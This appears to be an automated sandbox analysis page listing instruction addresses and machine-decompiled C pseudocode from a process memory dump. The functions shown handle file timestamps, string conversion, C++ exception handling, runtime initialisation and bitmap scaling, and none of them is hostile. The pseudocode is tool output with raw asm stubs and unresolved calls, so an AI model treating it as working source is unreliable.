0x00189225
0x00189228
0x00189235
0x0018923a
0x0018928e
0x00189296
0x00189298
0x0018929a
0x0018929d
0x0018929d
0x0018929d
0x001892a3
0x001892ab
0x001892be
0x001892c1
0x001892c3
0x001892c6
0x001892c7
0x001892e8
0x001892eb
0x001892eb
0x001892c9
0x001892c9
0x001892cb
0x001892d6
0x001892d6
0x001892d8
0x001892df
0x001892da
0x001892da
0x001892da
0x001892d8
0x001892ec
0x001892ee
0x001892ef
0x001892f2
0x001892f4
0x001892fe
0x00189308
0x001892f6
0x001892f6
0x001892f6
0x0018930d
0x0018930d
0x00189312
0x00189315
0x00189320
0x00189320
0x00189320
0x00189320
0x00189324
0x0018932b
0x0018932c
0x0018932f
0x00189332
0x00189332
0x00189334
0x00000000
0x00000000
0x0018934c
0x00189353
0x00189357
0x0018935a
0x0018935d
0x0018935f
0x0018935f
0x0018935f
0x00189361
0x00189364
0x00189367
0x00189369
0x00189371
0x00189377
0x0018937a
0x0018937d
0x0018937e
0x00189381
0x00189384
0x00189384
0x00189389
0x0018938c
0x00000000
0x00000000
0x001893a4
0x001893a9
0x001893ad
0x00000000
0x00000000
0x001893b1
0x001893b4
0x001893b5
0x001893b5
0x001893b7
0x001893ba
0x00000000
0x00000000
0x001893bc
0x001893bf
0x001893c6
0x001893c9
0x001893cc
0x001893e2
0x001893e2
0x001893e2
0x001893ce
0x001893ce
0x001893d0
0x001893d3
0x001893de
0x001893d5
0x001893d8
0x001893d8
0x001893d3
0x00000000
0x001893cc
0x001893c1
0x001893c1
0x001893c3
0x001893c3
0x00189317
0x00189317
0x0018931a
0x001893e5
0x001893e5
0x001893e7
0x001893e9
0x001893ec
0x001893ed
0x001893ee
0x001893ef
0x001893f7
0x001893f7
0x001893f7
0x001893f9
0x001893fc
0x001893ff
0x00189401
0x00189401
0x00189403
0x00189415
0x00189419
0x0018941c
0x00189423
0x0018942b
0x0018942b
0x0018942e
0x00189430
0x00189441
0x00189441
0x00189445
0x00189445
0x00189448
0x0018944a
0x0018944d
0x00000000
0x00189432
0x00189432
0x00189438
0x00189438
0x0018943c
0x0018944f
0x0018944f
0x00189453
0x00189454
0x00189456
0x00189458
0x00189499
0x00189499
0x0018949b
0x001894a8
0x001894a8
0x001894aa
0x001894ac
0x001894ad
0x001894ae
0x001894b5
0x001894b8
0x001894ba
0x001894ba
0x001894bb
0x001894bd
0x001894c0
0x001894c0
0x001894c2
0x001894c4
0x00000000
0x001894c4
0x0018949d
0x0018949f
0x00000000
0x00000000
0x001894a1
0x00000000
0x00000000
0x001894a3
0x001894a6
0x00000000
0x00000000
0x00000000
0x001894a6
0x0018945f
0x00189465
0x00189465
0x00189467
0x00189468
0x00189469
0x0018946a
0x00189471
0x00189474
0x00189476
0x00189477
0x00189479
0x00189486
0x00189486
0x00189488
0x0018948a
0x0018948b
0x0018948c
0x00189493
0x00189496
0x00189498
0x00189498
0x00000000
0x00189498
0x0018947b
0x0018947b
0x0018947d
0x00000000
0x00000000
0x0018947f
0x00000000
0x00000000
0x00189481
0x00189484
0x00000000
0x00000000
0x00000000
0x00189484
0x00189461
0x00189463
0x00000000
0x00000000
0x00000000
0x00189463
0x00189434
0x00189436
0x00000000
0x00000000
0x00000000
0x00189436
0x00189430
0x00000000
0x0018931a
0x00189315
0x0018923c
0x0018923e
0x00000000
0x00189240
0x00189256
0x0018925b
0x0018925d
0x00189269
0x0018926f
0x00189270
0x00189272
0x00189274
0x0018927f
0x0018927f
0x00189282
0x00189284
0x00189284
0x00189287
0x0018925f
0x0018925f
0x0018925f
0x00000000
0x0018925d
0x0018920c
0x0018920c
0x00189213
0x00189214
0x00189216
0x001894c8
0x001894cc
0x001894d1
0x001894d1
0x001894e0
0x001894e0

APIs

_strrchr.LIBCMT ref: 00189269
__alldvrm.LIBCMT ref: 0018946A
__alldvrm.LIBCMT ref: 0018948C

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
Instruction ID: 478e0b0f39c999022fd14a4a87cfec71948ae5ffdfee1ef5e80b9d4a9fc42ff5
Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
Instruction Fuzzy Hash: CBA139719043869FDB25EE68C8917BEBBE5FF65310F1C41ADE8959B281C3389A42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0016A2AB, Relevance: 6.1, APIs: 4, Instructions: 127
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0016A2AB(void* __edx) {
				signed char _t40;
				void* _t41;
				void* _t52;
				signed char _t70;
				void* _t79;
				signed int* _t81;
				signed int* _t84;
				void* _t85;
				signed int* _t88;
				void* _t90;

				_t79 = __edx;
				E0017E360();
				_t84 =  *(_t90 + 0x1038);
				_t70 = 1;
				if(_t84 == 0) {
					L2:
					 *(_t90 + 0x11) = 0;
					L3:
					_t81 =  *(_t90 + 0x1040);
					if(_t81 == 0) {
						L5:
						 *(_t90 + 0x13) = 0;
						L6:
						_t88 =  *(_t90 + 0x1044);
						if(_t88 == 0) {
							L8:
							 *(_t90 + 0x12) = 0;
							L9:
							_t40 = E0016A194( *(_t90 + 0x1038));
							 *(_t90 + 0x18) = _t40;
							if(_t40 == 0xffffffff || (_t70 & _t40) == 0) {
								_t70 = 0;
							} else {
								E0016A444( *((intOrPtr*)(_t90 + 0x103c)), 0);
							}
							_t41 = CreateFileW( *(_t90 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t90 + 0x14) = _t41;
							if(_t41 != 0xffffffff) {
								L16:
								if( *(_t90 + 0x11) != 0) {
									E00170BDD(_t84, _t79, _t90 + 0x1c);
								}
								if( *(_t90 + 0x13) != 0) {
									E00170BDD(_t81, _t79, _t90 + 0x2c);
								}
								if( *(_t90 + 0x12) != 0) {
									E00170BDD(_t88, _t79, _t90 + 0x24);
								}
								_t85 =  *(_t90 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t85,  ~( *(_t90 + 0x1b) & 0x000000ff) & _t90 + 0x00000030,  ~( *(_t90 + 0x16) & 0x000000ff) & _t90 + 0x00000024,  ~( *(_t90 + 0x11) & 0x000000ff) & _t90 + 0x0000001c);
								_t52 = CloseHandle(_t85);
								if(_t70 != 0) {
									_t52 = E0016A444( *((intOrPtr*)(_t90 + 0x103c)),  *(_t90 + 0x18));
								}
								goto L24;
							} else {
								_t52 = E0016B66C( *(_t90 + 0x1040), _t90 + 0x38, 0x800);
								if(_t52 == 0) {
									L24:
									return _t52;
								}
								_t52 = CreateFileW(_t90 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t90 + 0x14) = _t52;
								if(_t52 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t90 + 0x12) = _t70;
						if(( *_t88 | _t88[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t90 + 0x13) = _t70;
					if(( *_t81 | _t81[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t90 + 0x11) = 1;
				if(( *_t84 | _t84[1]) != 0) {
					goto L3;
				}
				goto L2;
			}

0x0016a2ab
0x0016a2b0
0x0016a2bc
0x0016a2c3
0x0016a2c7
0x0016a2d4
0x0016a2d4
0x0016a2d8
0x0016a2d8
0x0016a2e1
0x0016a2ee
0x0016a2ee
0x0016a2f2
0x0016a2f2
0x0016a2fb
0x0016a309
0x0016a309
0x0016a30d
0x0016a314
0x0016a319
0x0016a320
0x0016a336
0x0016a326
0x0016a32f
0x0016a32f
0x0016a351
0x0016a357
0x0016a35e
0x0016a3a8
0x0016a3ad
0x0016a3b6
0x0016a3b6
0x0016a3c0
0x0016a3c9
0x0016a3c9
0x0016a3d3
0x0016a3dc
0x0016a3dc
0x0016a3ec
0x0016a3f0
0x0016a400
0x0016a410
0x0016a416
0x0016a41d
0x0016a425
0x0016a432
0x0016a432
0x00000000
0x0016a360
0x0016a371
0x0016a378
0x0016a437
0x0016a441
0x0016a441
0x0016a395
0x0016a39b
0x0016a3a2
0x00000000
0x00000000
0x00000000
0x0016a3a2
0x0016a35e
0x0016a303
0x0016a307
0x00000000
0x00000000
0x00000000
0x0016a307
0x0016a2e8
0x0016a2ec
0x00000000
0x00000000
0x00000000
0x0016a2ec
0x0016a2ce
0x0016a2d2
0x00000000
0x00000000
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,001680B7,?,?,?), ref: 0016A351
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,001680B7,?,?), ref: 0016A395
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,001680B7,?,?,?,?,?,?,?,?), ref: 0016A416
CloseHandle.KERNEL32(?,?,00000000,?,001680B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0016A41D

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: c233573f265a9f1e7ba260d66587bd823328629f629082d282be1cb78dcf6baa
Instruction ID: d55b3675f0e1eb200a949291e22489e1f118ecc9dda944b3fbedb4bc59d8c9d3
Opcode Fuzzy Hash: c233573f265a9f1e7ba260d66587bd823328629f629082d282be1cb78dcf6baa
Instruction Fuzzy Hash: A641DD31288380AAE731DF24CC55BAFBBE8AF95700F48091DF5E0E3281D7649A58DB53

Uniqueness

Uniqueness Score: -1.00%

Function 0018C099, Relevance: 6.1, APIs: 4, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0018C099(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x19e668; // 0xd6971696
				_v8 = _t34 ^ _t70;
				E00183DD6(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E0017EC4A(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E0017F350(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E0018A2C0(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E00188518(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00191A30();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}

0x0018c0a1
0x0018c0a8
0x0018c0b4
0x0018c0b9
0x0018c0be
0x0018c0c3
0x0018c0c6
0x0018c0c8
0x0018c0c8
0x0018c0cd
0x0018c0e6
0x0018c0ec
0x0018c0f1
0x0018c190
0x0018c194
0x0018c199
0x0018c199
0x0018c1b5
0x0018c1b5
0x0018c0f7
0x0018c0ff
0x0018c103
0x0018c14f
0x0018c151
0x0018c153
0x0018c158
0x0018c16f
0x0018c177
0x0018c187
0x0018c187
0x0018c177
0x0018c189
0x0018c18a
0x00000000
0x0018c18f
0x0018c10a
0x0018c10c
0x0018c10e
0x0018c116
0x0018c133
0x0018c13d
0x0018c142
0x00000000
0x00000000
0x0018c144
0x0018c14a
0x0018c14a
0x00000000
0x0018c14a
0x0018c11a
0x0018c11e
0x0018c123
0x0018c127
0x00000000
0x00000000
0x0018c129
0x00000000

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,001889AD,?,00000000,?,00000001,?,?,00000001,001889AD,?), ref: 0018C0E6
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0018C16F
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001867E2,?), ref: 0018C181
__freea.LIBCMT ref: 0018C18A

Part of subcall function 00188518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0018C13D,00000000,?,001867E2,?,00000008,?,001889AD,?,?,?), ref: 0018854A

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 46baedf592aefbc8f38daa22ea1b863169241eed6a716bc6b17d5c3ec022bd8d
Instruction ID: c1db2678365e2a1da94613cec301fc96cb4a462571203f73634e3938e1dc8f72
Opcode Fuzzy Hash: 46baedf592aefbc8f38daa22ea1b863169241eed6a716bc6b17d5c3ec022bd8d
Instruction Fuzzy Hash: 6431CD72A0020AEBDB25AF64DC89DAF7BA5EB44710F194129FC14D7251EB35CE91CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00182503, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E00182503(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E00182B52(__edx, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E0017FC0B(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E00182D54(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E0018230D(_t29, _t32, _t37);
				if(_t25 != 0) {
					E0017FBD9(_t25, _t30);
					return _t25;
				}
				return _t25;
			}

0x00182503
0x00182503
0x00182506
0x0018250b
0x0018250e
0x00182510
0x00182513
0x00182516
0x00182517
0x0018251a
0x0018251f
0x0018251f
0x00182522
0x00182526
0x00182529
0x0018252e
0x0018252b
0x0018252b
0x0018252b
0x00182531
0x00182537
0x0018253a
0x0018253c
0x0018253f
0x00182542
0x00182543
0x0018254c
0x00182551
0x00182554
0x0018255a
0x0018255d
0x00182560
0x00182563
0x00182564
0x00182567
0x00182572
0x00182576
0x00000000
0x00182576
0x0018257d

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0018251A

Part of subcall function 00182B52: ___AdjustPointer.LIBCMT ref: 00182B9C

_UnwindNestedFrames.LIBCMT ref: 00182531
___FrameUnwindToState.LIBVCRUNTIME ref: 00182543
CallCatchBlock.LIBVCRUNTIME ref: 00182567

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction ID: b3b352039356e563926080cba99675d50cec093640309c12dbb388ee4f9a5ee4
Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction Fuzzy Hash: C0010532000108ABCF13AF65CD01EDA3BBAEF69710F058015F91866120C336EA62AFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00179DBB, Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00179DBB() {
				struct HDC__* _t1;
				struct HDC__* _t5;

				_t1 = GetDC(0);
				_t5 = _t1;
				if(_t5 != 0) {
					 *0x1a8428 = GetDeviceCaps(_t5, 0x58);
					 *0x1a842c = GetDeviceCaps(_t5, 0x5a);
					return ReleaseDC(0, _t5);
				}
				return _t1;
			}

0x00179dbe
0x00179dc4
0x00179dc8
0x00179dd6
0x00179de4
0x00000000
0x00179de9
0x00179df0

APIs

GetDC.USER32(00000000), ref: 00179DBE
GetDeviceCaps.GDI32(00000000,00000058), ref: 00179DCD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00179DDB
ReleaseDC.USER32(00000000,00000000), ref: 00179DE9

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 1e2b4c83b5694f6123657794ada647b67e0f972227ec8a38dbabde2c8fbfd4b4
Instruction ID: ff7321b487e9936efa8e7ef918adc523f6115b46366801f80b30b11145b45b7a
Opcode Fuzzy Hash: 1e2b4c83b5694f6123657794ada647b67e0f972227ec8a38dbabde2c8fbfd4b4
Instruction Fuzzy Hash: 53E0EC31985621A7D3201BA4AC0DF8F3F64AB0E712F050016F60696590EA708495CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00182016, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00182016() {
				void* _t4;
				void* _t8;

				E00183437();
				E001833CB();
				if(E0018310E() != 0) {
					_t4 = E0018215C(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E0018314A();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00182016
0x0018201b
0x00182027
0x0018202c
0x00182031
0x00182033
0x0018203e
0x00182035
0x00182035
0x00000000
0x00182035
0x00182029
0x00182029
0x0018202b
0x0018202b

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00182016
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0018201B
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00182020

Part of subcall function 0018310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0018311F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00182035

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction ID: adf7724021ed6c39182d2a33634d965994dd02da3d8a2dd8167dc3840628e2ce
Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction Fuzzy Hash: 2AC00134104640A41C233AB2221A2AA1B005B73F88BAA20C2FCA017103DF260B0AAF37

Uniqueness

Uniqueness Score: -1.00%

Function 00179F5D, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E00179F5D(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v84;
				intOrPtr _v116;
				void* _v120;
				short _v122;
				short _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				intOrPtr* _v140;
				char _v152;
				signed int _v160;
				intOrPtr _v164;
				char _v180;
				intOrPtr* _v192;
				intOrPtr* _v200;
				signed int _v208;
				char _v212;
				signed int _v216;
				signed int _v220;
				void* _v224;
				char _v228;
				intOrPtr* _v232;
				intOrPtr* _v240;
				void* _v256;
				intOrPtr* _v264;
				void* __edi;
				signed int _t78;
				intOrPtr* _t84;
				void* _t86;
				signed int _t87;
				signed int _t90;
				short _t100;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t107;
				intOrPtr* _t110;
				intOrPtr* _t116;
				intOrPtr* _t128;
				intOrPtr* _t131;
				intOrPtr* _t134;
				void* _t141;
				intOrPtr* _t146;
				intOrPtr* _t158;
				intOrPtr* _t161;
				signed int _t175;
				void* _t177;
				void* _t179;
				intOrPtr* _t181;
				signed int _t195;
				long long* _t197;
				long long _t200;

				_t200 = __fp0;
				if(E00179DF1() != 0) {
					_t141 = _a4;
					GetObjectW(_t141, 0x18,  &_v68);
					_t195 = _v0;
					asm("cdq");
					_t78 = _v72 * _v4 / _v76;
					if(_t78 < _t195) {
						_t195 = _t78;
					}
					_t177 = 0;
					_push( &_v120);
					_push(0x194684);
					_push(1);
					_push(0);
					_push(0x19546c);
					if( *0x1c2174() < 0) {
						L19:
						return _t141;
					} else {
						_t84 = _v140;
						 *0x193260(_t84, _t141, 0, 2,  &_v136, _t179);
						_t86 =  *((intOrPtr*)( *_t84 + 0x54))();
						_t87 = _v160;
						if(_t86 >= 0) {
							_v152 = 0;
							_t181 =  *((intOrPtr*)( *_t87 + 0x28));
							_t146 = _t181;
							 *0x193260(_t87,  &_v152);
							if( *_t181() >= 0) {
								_t90 = _v160;
								asm("fldz");
								 *_t197 = _t200;
								 *0x193260(_t90, _v164, 0x19547c, 0, 0, _t146, _t146, 0);
								if( *((intOrPtr*)( *_t90 + 0x20))() >= 0) {
									E0017F350(0,  &_v136, 0, 0x2c);
									_v132 = _v84;
									_v136 = 0x28;
									_v128 =  ~_t195;
									_v120 = 0;
									_v124 = 1;
									_t100 = 0x20;
									_v122 = _t100;
									_t103 =  *0x1c205c(0,  &_v136, 0,  &_v180, 0, 0);
									_v208 = _t103;
									asm("sbb ecx, ecx");
									if(( ~_t103 & 0x7ff8fff2) + 0x8007000e >= 0) {
										_t158 = _v224;
										 *0x193260(_t158,  &_v212);
										 *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x2c))))();
										_t116 = _v220;
										 *0x193260(_t116, _v228, _v116, _t195, 3);
										 *((intOrPtr*)( *_t116 + 0x20))();
										_t175 = _v136;
										_t161 = _v240;
										_v220 = _t175;
										_v228 = 0;
										_v224 = 0;
										_v216 = _t195;
										 *0x193260(_t161,  &_v228, _t175 << 2, _t175 * _t195 << 2, _v232);
										if( *((intOrPtr*)( *_t161 + 0x1c))() < 0) {
											DeleteObject(_v256);
										} else {
											_t177 = _v256;
										}
										_t128 = _v264;
										 *0x193260(_t128);
										 *((intOrPtr*)( *((intOrPtr*)( *_t128 + 8))))();
									}
									_t104 = _v220;
									 *0x193260(_t104);
									 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))();
									_t107 = _v220;
									 *0x193260(_t107);
									 *((intOrPtr*)( *((intOrPtr*)( *_t107 + 8))))();
									_t110 = _v232;
									 *0x193260(_t110);
									 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 8))))();
									if(_t177 != 0) {
										_t141 = _t177;
									}
									L18:
									goto L19;
								}
								_t131 = _v192;
								 *0x193260(_t131);
								 *((intOrPtr*)( *((intOrPtr*)( *_t131 + 8))))();
							}
							_t134 = _v200;
							 *0x193260(_t134);
							 *((intOrPtr*)( *((intOrPtr*)( *_t134 + 8))))();
							_t87 = _v208;
						}
						 *0x193260(_t87);
						 *((intOrPtr*)( *((intOrPtr*)( *_t87 + 8))))();
						goto L18;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E0017A1E5();
			}

0x00179f5d
0x00179f67
0x00179f80
0x00179f8d
0x00179f9c
0x00179fa3
0x00179fa4
0x00179faa
0x00179fac
0x00179fac
0x00179fb3
0x00179fb5
0x00179fb6
0x00179fbe
0x00179fbf
0x00179fc0
0x00179fcd
0x0017a1da
0x00000000
0x00179fd3
0x00179fd3
0x00179fe7
0x00179fed
0x00179ff2
0x00179ff6
0x0017a00d
0x0017a019
0x0017a01c
0x0017a01e
0x0017a028
0x0017a044
0x0017a048
0x0017a04f
0x0017a061
0x0017a06c
0x0017a08c
0x0017a09b
0x0017a0a3
0x0017a0ab
0x0017a0b4
0x0017a0b8
0x0017a0bd
0x0017a0c0
0x0017a0d1
0x0017a0d9
0x0017a0df
0x0017a0ed
0x0017a0f3
0x0017a104
0x0017a10a
0x0017a10c
0x0017a124
0x0017a12a
0x0017a12d
0x0017a13a
0x0017a141
0x0017a145
0x0017a149
0x0017a14d
0x0017a166
0x0017a171
0x0017a17d
0x0017a173
0x0017a173
0x0017a173
0x0017a183
0x0017a18f
0x0017a195
0x0017a195
0x0017a197
0x0017a1a3
0x0017a1a9
0x0017a1ab
0x0017a1b7
0x0017a1bd
0x0017a1bf
0x0017a1cb
0x0017a1d1
0x0017a1d5
0x0017a1d7
0x0017a1d7
0x0017a1d9
0x00000000
0x0017a1d9
0x0017a06e
0x0017a07a
0x0017a080
0x0017a080
0x0017a02a
0x0017a036
0x0017a03c
0x0017a03e
0x0017a03e
0x0017a000
0x0017a006
0x00000000
0x0017a006
0x00179fcd
0x00179f69
0x00179f6d
0x00179f71
0x00000000

APIs

Part of subcall function 00179DF1: GetDC.USER32(00000000), ref: 00179DF5
Part of subcall function 00179DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00179E00
Part of subcall function 00179DF1: ReleaseDC.USER32(00000000,00000000), ref: 00179E0B

GetObjectW.GDI32(?,00000018,?), ref: 00179F8D

